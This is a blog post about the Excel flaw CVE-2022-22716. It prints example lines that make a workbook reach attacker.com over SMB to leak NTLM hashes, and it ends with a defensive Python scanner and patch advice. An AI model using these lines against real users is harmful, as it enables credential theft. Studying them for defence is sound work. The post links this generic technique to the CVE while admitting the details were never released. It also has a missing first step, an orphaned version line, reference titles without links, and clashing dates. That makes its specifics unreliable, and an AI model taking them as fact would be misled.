On January 11, 2022, Microsoft disclosed a significant vulnerability affecting Microsoft Excel, tracked as CVE-2022-22716. This security flaw falls under the “Information Disclosure” category, meaning it could let an attacker access sensitive device information through a specially crafted Excel file.

In this post, we'll break down what CVE-2022-22716 is, how it can be exploited, and how users can protect themselves. We'll show some code snippets related to the vulnerability and offer references to official sources for further reading.

What Is CVE-2022-22716?

CVE-2022-22716 is an information disclosure vulnerability in Microsoft Excel. When a user opens a specially crafted Excel file (with extensions like .xls, .xlsx, .xlsm, or .xlsb), the application could inadvertently expose information to an attacker. The flaw affects various Excel versions on both Windows and macOS.

How Does the Exploit Work?

An attacker can exploit this flaw by tricking the victim into opening a maliciously crafted Excel file. The exploit is triggered when Excel processes certain formulas or embedded objects that reference external resources or internal data. If successful, the attacker may access sensitive device or network information.

The flaw does not allow the attacker to execute arbitrary code or take full control of the device, but the leaked information can be used in further attacks (such as phishing or lateral movement).

Technical Breakdown & Code Snippet

Microsoft did not release the full technical details for security reasons. However, the exploit typically relies on embedding a reference to an external resource in a cell formula.

Example Exploit – Leaking NTLM Hashes

One well-known technique involves getting Excel to auto-load images from a remote SMB server, which leaks the user's NTLM hash.

=WEBSERVICE("\\attacker.com\share\file")

Or, an embedded image in the Excel file:

<picture>
    <v:imagedata src="\\attacker.com\share\image.png"/>
</picture>

- Instead of loading an image, Excel sends a request to attacker.com.
- During authentication, the user's device sends hashed credentials (e.g., NTLM hash), which the attacker can capture and potentially crack.

2. Victim opens file: Excel automatically tries to access the remote resource.

3. Information leaks: Device info, user credentials, or other sensitive information is sent to the attacker-controlled server without the victim's knowledge.

It can be that simple. No pop-ups, no obvious clues. Security tools may not always catch it immediately.
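For triage on the defender's side, the remote-path references shown above can be searched for before a workbook is ever opened. The sketch below is an added example, not code from Microsoft or from the original post; it covers only ZIP-based OOXML files (.xlsx/.xlsm), and the host name files.example.test and the two-part sample package are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
# UNC path (\\host\share\...) or file:// URL, the kind of reference shown above.
REMOTE_RE = re.compile(r"(\\\\[A-Za-z0-9.\-]+\\[^\s\"'<>&)]+|file://[^\s\"'<>&)]+)", re.I)

def scan_workbook(data: bytes):
    """Return sorted (part, kind, value) findings for an OOXML (.xlsx/.xlsm) package."""
    findings = set()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".xml", ".rels", ".vml")):
                continue
            raw = zf.read(name)
            if b"<!DOCTYPE" in raw:  # OOXML parts carry no DTD; flag it and do not parse
                findings.add((name, "dtd-present", ""))
                continue
            if name.lower().endswith(".rels"):
                try:
                    root = ET.fromstring(raw)
                except ET.ParseError:
                    findings.add((name, "unparseable-rels", ""))
                    continue
                for rel in root.iter(REL_TAG):
                    if rel.get("TargetMode") == "External":  # target lives outside the package
                        findings.add((name, "external-relationship", rel.get("Target", "")))
            else:  # sheet, drawing and VML parts: look for remote paths in formulas/attributes
                text = raw.decode("utf-8", "replace")
                findings.update((name, "remote-path", m.group(1)) for m in REMOTE_RE.finditer(text))
    return sorted(findings)

def build_sample() -> bytes:
    """Constructed two-part package (not a complete workbook) using a made-up host."""
    sheet = ('<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData>'
             '<row r="1"><c r="A1"><f>WEBSERVICE("\\\\files.example.test\\share\\file")</f></c></row>'
             '</sheetData></worksheet>')
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"'
            ' Target="\\\\files.example.test\\share\\image.png" TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
        zf.writestr("xl/drawings/_rels/drawing1.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    print(scan_workbook(build_sample()))
```

A finding is a reason to inspect the file, not proof of malice: legitimate workbooks also link to external data, so review the reported target before deciding.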

Excel 2016, 2019, Microsoft 365 (macOS)

Check your version and apply the latest patches as soon as possible.

Microsoft released a fix as part of its January 2022 updates.

Download the security updates for Office

Use Protected View:

By default, files from the internet open in Protected View. Don't enable editing unless you trust the sender.

References

- Microsoft Advisory for CVE-2022-22716
- NVD Entry
- Microsoft: Prevent Information Disclosure via Excel
- Excel Security Best Practices

Conclusion

While CVE-2022-22716 may not let attackers take over your device, leaking device or credential information is a serious risk. Attackers can use this data for further attacks. Always keep your software updated and be careful with unknown attachments.

Stay safe, and check for security updates regularly.


*This article is independently created for security awareness. For more details, always refer to official advisories and resources.*

Timeline

Published on: 02/09/2022 17:15:00 UTC
Last modified on: 03/04/2022 21:31:00 UTC